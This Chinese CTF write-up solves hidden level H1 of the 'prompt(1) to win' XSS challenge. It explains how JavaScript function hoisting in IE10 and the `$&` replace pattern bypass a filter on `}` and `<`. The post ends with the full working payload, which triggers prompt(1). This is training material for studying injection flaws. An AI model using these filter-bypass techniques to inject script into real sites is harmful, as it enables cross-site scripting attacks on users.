【prompt(1) to win】 Level H1 - Hoisting

解题报告 CTF prompt(1) to win
CTF
原创
发布日期:   2020-08-05
更新日期:   2024-04-10
文章字数:   2.6k
阅读时长:   13 分
阅读次数:  

题目(隐藏关卡)

function escape(input) {
    // WORLD -1

    // strip off certain characters from breaking conditional statement
    input = input.replace(/[}<]/g, '');

    return '                                                     \n\
<script>                                                         \n\
    if (history.length > 1337) {                                 \n\
        // you can inject any code here                          \n\
        // as long as it will be executed                        \n\
        {{injection}}                                            \n\
    }                                                            \n\
</script>                                                        \n\
    '.replace('{{injection}}', input);
}

分析

从代码可以知道,注入点在 if 内部,很自然有三种思路:

  • 使得 history.length > 1337 条件成立
  • 闭合 if
  • 闭合 <script>

但是由于 }< 被过滤了,因此不论闭合 if 还是 <script> 都是不可能的,剩下的方法就是想办法令到 history.length > 1337 条件成立。

前置知识

解题思路

这些知识点是这题的解题关键。

关于 history 对象,需要知道的是它不可被直接读写,目前唯一保留的 API 只有 4 个:lengthback()forward()go()

而在本题中用到的 length ,它会在首次打开浏览器窗口的时候置 0 ,每访问一个新得页面自动 +1 。但是这个特性并不能被利用来解题,原因是 length 的上限值是 50,而条件中的目标值是 1337 ,即使我们预先访问了 1337 个页面, length 的值还是 50 ,仍然无法绕过条件。

但这并不意味着毫无办法了:因为 history 说到底就是一个全局对象,我们可以构造一个同名的 history 对象(必定是局部对象)实现对全局对象的覆盖。同时只要所构造的这个 history 局部对象同样具备 length 属性,且可以被我们自由控制,那么就能实现 if 条件绕过了。

既然可以使用局部对象覆盖,那么就有两个选择:

  • 局部变量(如数组):可以初始化数组的元素个数控制 length 属性
  • 局部函数 :可以通过声明入参的个数控制 length 属性

但是不要忘了,我们的注入点是在 if 里面的,亦即不管我们声明 history 局部函数、还是声明 history 局部变量,都是在 history.length 条件后面的位置,亦即会出现 先使用后声明 的语法错误。

而为了解决这个问题,可以利用 Javascript 中的 Hoisting (提升)机制:在早期的 Javascript 编译器中,会把所有出现在代码中的 变量声明 或 函数声明,全部移到代码的开头。

不过 变量提升 和 函数提升 之间还是存在区别的:

  • 变量提升:仅仅是把 声明变量的语句 提升到代码的开头,但是初始化语句还是保留在原有位置不变的,如果在初始化语句之前就使用了该变量,依然会出现语法错误(变量未定义)
  • 函数提升:函数不存在初始化的说法,从而因为提升机制,使得函数只要在任意地方声明过一次,就可以在任何位置调用。

回到这题,由于注入点在 if 里面,所有我们应该选择函数提升,而不是变量提升。

Javascript 的 Hoisting 机制仅在早期的编译器支持,现在 2019 年绝大部分浏览器都不会这样做了,经测试只有 IE10 还支持这种机制,换言之要用 Hoisting 机制解题,只能使用 IE10 浏览器。

构造 payload

根据前面的思路,我们构造 payload 的方法为:在注入点声明一个 history 局部函数,函数入参数量至少为 1338 ,就能使得 if 条件成立,从而执行我们注入的代码。

例如 payload 为:

funcation history(a1, a2, a3, ......, a1338) { /* any codes */ } prompt(1);

不过这个 payload 有个问题:就是我们要构造 history 函数,就需要使用到花括号 { } ,但是 } 已经被题目过滤了 !换言之我们不能直接输入 }

不能直接输入,但是可以间接输入。

绕过的方法需要利用到题目 JS 的 replace('{{injection}}', input) 函数的语法,第二个由我们控制的参数 input 是可以插入特殊变量名以达到某些效果的(详见 这里 ):

而我们要使用的特殊变量名,就是

$&      // 这个变量名的效果是 【插入当前匹配的子串自身】。

就这题而言,因为 replace('{{injection}}', input) 被匹配的子串必定是 {{injection}},利用 $& 将其插入到我们的 payload ,就能获得两对花括号 {{ }} 了,而里面的一对花括号会被编译器认为是局部代码块,因此并不会影响语法。

所以我们应该构造的 payload 为 :

funcation history(a1, a2, a3, ......, a1338) $& prompt(1);

当这个 payload 经过题目的 replace('{{injection}}', input) 函数处理,就会得到我们想要的效果:

<script>
    if (history.length > 1337) {
        funcation history(a1, a2, a3, ......, a1338) {{injection}} prompt(1);
    }
</script>

完成挑战

最后,输入这个 payload 到 IE10 即可完成挑战:

function history(a1,a2,a3,a4,a5,a6,a7,a8,a9,a10,a11,a12,a13,a14,a15,a16,a17,a18,a19,a20,a21,a22,a23,a24,a25,a26,a27,a28,a29,a30,a31,a32,a33,a34,a35,a36,a37,a38,a39,a40,a41,a42,a43,a44,a45,a46,a47,a48,a49,a50,a51,a52,a53,a54,a55,a56,a57,a58,a59,a60,a61,a62,a63,a64,a65,a66,a67,a68,a69,a70,a71,a72,a73,a74,a75,a76,a77,a78,a79,a80,a81,a82,a83,a84,a85,a86,a87,a88,a89,a90,a91,a92,a93,a94,a95,a96,a97,a98,a99,a100,a101,a102,a103,a104,a105,a106,a107,a108,a109,a110,a111,a112,a113,a114,a115,a116,a117,a118,a119,a120,a121,a122,a123,a124,a125,a126,a127,a128,a129,a130,a131,a132,a133,a134,a135,a136,a137,a138,a139,a140,a141,a142,a143,a144,a145,a146,a147,a148,a149,a150,a151,a152,a153,a154,a155,a156,a157,a158,a159,a160,a161,a162,a163,a164,a165,a166,a167,a168,a169,a170,a171,a172,a173,a174,a175,a176,a177,a178,a179,a180,a181,a182,a183,a184,a185,a186,a187,a188,a189,a190,a191,a192,a193,a194,a195,a196,a197,a198,a199,a200,a201,a202,a203,a204,a205,a206,a207,a208,a209,a210,a211,a212,a213,a214,a215,a216,a217,a218,a219,a220,a221,a222,a223,a224,a225,a226,a227,a228,a229,a230,a231,a232,a233,a234,a235,a236,a237,a238,a239,a240,a241,a242,a243,a244,a245,a246,a247,a248,a249,a250,a251,a252,a253,a254,a255,a256,a257,a258,a259,a260,a261,a262,a263,a264,a265,a266,a267,a268,a269,a270,a271,a272,a273,a274,a275,a276,a277,a278,a279,a280,a281,a282,a283,a284,a285,a286,a287,a288,a289,a290,a291,a292,a293,a294,a295,a296,a297,a298,a299,a300,a301,a302,a303,a304,a305,a306,a307,a308,a309,a310,a311,a312,a313,a314,a315,a316,a317,a318,a319,a320,a321,a322,a323,a324,a325,a326,a327,a328,a329,a330,a331,a332,a333,a334,a335,a336,a337,a338,a339,a340,a341,a342,a343,a344,a345,a346,a347,a348,a349,a350,a351,a352,a353,a354,a355,a356,a357,a358,a359,a360,a361,a362,a363,a364,a365,a366,a367,a368,a369,a370,a371,a372,a373,a374,a375,a376,a377,a378,a379,a380,a381,a382,a383,a384,a385,a386,a387,a388,a389,a390,a391,a392,a393,a394,a395,a396,a397,a398,a399,a400,a401,a402,a403,a404,a405,a406,a407,a408,a409,a410,a411,a412,a413,a414,a415,a416,a417,a418,a419,a420,a421,a422,a423,a424,a425,a426,a427,a428,a429,a430,a431,a432,a433,a434,a435,a436,a437,a438,a439,a440,a441,a442,a443,a444,a445,a446,a447,a448,a449,a450,a451,a452,a453,a454,a455,a456,a457,a458,a459,a460,a461,a462,a463,a464,a465,a466,a467,a468,a469,a470,a471,a472,a473,a474,a475,a476,a477,a478,a479,a480,a481,a482,a483,a484,a485,a486,a487,a488,a489,a490,a491,a492,a493,a494,a495,a496,a497,a498,a499,a500,a501,a502,a503,a504,a505,a506,a507,a508,a509,a510,a511,a512,a513,a514,a515,a516,a517,a518,a519,a520,a521,a522,a523,a524,a525,a526,a527,a528,a529,a530,a531,a532,a533,a534,a535,a536,a537,a538,a539,a540,a541,a542,a543,a544,a545,a546,a547,a548,a549,a550,a551,a552,a553,a554,a555,a556,a557,a558,a559,a560,a561,a562,a563,a564,a565,a566,a567,a568,a569,a570,a571,a572,a573,a574,a575,a576,a577,a578,a579,a580,a581,a582,a583,a584,a585,a586,a587,a588,a589,a590,a591,a592,a593,a594,a595,a596,a597,a598,a599,a600,a601,a602,a603,a604,a605,a606,a607,a608,a609,a610,a611,a612,a613,a614,a615,a616,a617,a618,a619,a620,a621,a622,a623,a624,a625,a626,a627,a628,a629,a630,a631,a632,a633,a634,a635,a636,a637,a638,a639,a640,a641,a642,a643,a644,a645,a646,a647,a648,a649,a650,a651,a652,a653,a654,a655,a656,a657,a658,a659,a660,a661,a662,a663,a664,a665,a666,a667,a668,a669,a670,a671,a672,a673,a674,a675,a676,a677,a678,a679,a680,a681,a682,a683,a684,a685,a686,a687,a688,a689,a690,a691,a692,a693,a694,a695,a696,a697,a698,a699,a700,a701,a702,a703,a704,a705,a706,a707,a708,a709,a710,a711,a712,a713,a714,a715,a716,a717,a718,a719,a720,a721,a722,a723,a724,a725,a726,a727,a728,a729,a730,a731,a732,a733,a734,a735,a736,a737,a738,a739,a740,a741,a742,a743,a744,a745,a746,a747,a748,a749,a750,a751,a752,a753,a754,a755,a756,a757,a758,a759,a760,a761,a762,a763,a764,a765,a766,a767,a768,a769,a770,a771,a772,a773,a774,a775,a776,a777,a778,a779,a780,a781,a782,a783,a784,a785,a786,a787,a788,a789,a790,a791,a792,a793,a794,a795,a796,a797,a798,a799,a800,a801,a802,a803,a804,a805,a806,a807,a808,a809,a810,a811,a812,a813,a814,a815,a816,a817,a818,a819,a820,a821,a822,a823,a824,a825,a826,a827,a828,a829,a830,a831,a832,a833,a834,a835,a836,a837,a838,a839,a840,a841,a842,a843,a844,a845,a846,a847,a848,a849,a850,a851,a852,a853,a854,a855,a856,a857,a858,a859,a860,a861,a862,a863,a864,a865,a866,a867,a868,a869,a870,a871,a872,a873,a874,a875,a876,a877,a878,a879,a880,a881,a882,a883,a884,a885,a886,a887,a888,a889,a890,a891,a892,a893,a894,a895,a896,a897,a898,a899,a900,a901,a902,a903,a904,a905,a906,a907,a908,a909,a910,a911,a912,a913,a914,a915,a916,a917,a918,a919,a920,a921,a922,a923,a924,a925,a926,a927,a928,a929,a930,a931,a932,a933,a934,a935,a936,a937,a938,a939,a940,a941,a942,a943,a944,a945,a946,a947,a948,a949,a950,a951,a952,a953,a954,a955,a956,a957,a958,a959,a960,a961,a962,a963,a964,a965,a966,a967,a968,a969,a970,a971,a972,a973,a974,a975,a976,a977,a978,a979,a980,a981,a982,a983,a984,a985,a986,a987,a988,a989,a990,a991,a992,a993,a994,a995,a996,a997,a998,a999,a1000,a1001,a1002,a1003,a1004,a1005,a1006,a1007,a1008,a1009,a1010,a1011,a1012,a1013,a1014,a1015,a1016,a1017,a1018,a1019,a1020,a1021,a1022,a1023,a1024,a1025,a1026,a1027,a1028,a1029,a1030,a1031,a1032,a1033,a1034,a1035,a1036,a1037,a1038,a1039,a1040,a1041,a1042,a1043,a1044,a1045,a1046,a1047,a1048,a1049,a1050,a1051,a1052,a1053,a1054,a1055,a1056,a1057,a1058,a1059,a1060,a1061,a1062,a1063,a1064,a1065,a1066,a1067,a1068,a1069,a1070,a1071,a1072,a1073,a1074,a1075,a1076,a1077,a1078,a1079,a1080,a1081,a1082,a1083,a1084,a1085,a1086,a1087,a1088,a1089,a1090,a1091,a1092,a1093,a1094,a1095,a1096,a1097,a1098,a1099,a1100,a1101,a1102,a1103,a1104,a1105,a1106,a1107,a1108,a1109,a1110,a1111,a1112,a1113,a1114,a1115,a1116,a1117,a1118,a1119,a1120,a1121,a1122,a1123,a1124,a1125,a1126,a1127,a1128,a1129,a1130,a1131,a1132,a1133,a1134,a1135,a1136,a1137,a1138,a1139,a1140,a1141,a1142,a1143,a1144,a1145,a1146,a1147,a1148,a1149,a1150,a1151,a1152,a1153,a1154,a1155,a1156,a1157,a1158,a1159,a1160,a1161,a1162,a1163,a1164,a1165,a1166,a1167,a1168,a1169,a1170,a1171,a1172,a1173,a1174,a1175,a1176,a1177,a1178,a1179,a1180,a1181,a1182,a1183,a1184,a1185,a1186,a1187,a1188,a1189,a1190,a1191,a1192,a1193,a1194,a1195,a1196,a1197,a1198,a1199,a1200,a1201,a1202,a1203,a1204,a1205,a1206,a1207,a1208,a1209,a1210,a1211,a1212,a1213,a1214,a1215,a1216,a1217,a1218,a1219,a1220,a1221,a1222,a1223,a1224,a1225,a1226,a1227,a1228,a1229,a1230,a1231,a1232,a1233,a1234,a1235,a1236,a1237,a1238,a1239,a1240,a1241,a1242,a1243,a1244,a1245,a1246,a1247,a1248,a1249,a1250,a1251,a1252,a1253,a1254,a1255,a1256,a1257,a1258,a1259,a1260,a1261,a1262,a1263,a1264,a1265,a1266,a1267,a1268,a1269,a1270,a1271,a1272,a1273,a1274,a1275,a1276,a1277,a1278,a1279,a1280,a1281,a1282,a1283,a1284,a1285,a1286,a1287,a1288,a1289,a1290,a1291,a1292,a1293,a1294,a1295,a1296,a1297,a1298,a1299,a1300,a1301,a1302,a1303,a1304,a1305,a1306,a1307,a1308,a1309,a1310,a1311,a1312,a1313,a1314,a1315,a1316,a1317,a1318,a1319,a1320,a1321,a1322,a1323,a1324,a1325,a1326,a1327,a1328,a1329,a1330,a1331,a1332,a1333,a1334,a1335,a1336,a1337,a1338) $& prompt(1);

答案下载

文章作者: EXP
文章链接: https://exp-blog.com/safe/ctf/prompt/level-h1-hoisting/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 EXP !
解题报告 CTF prompt(1) to win
  目录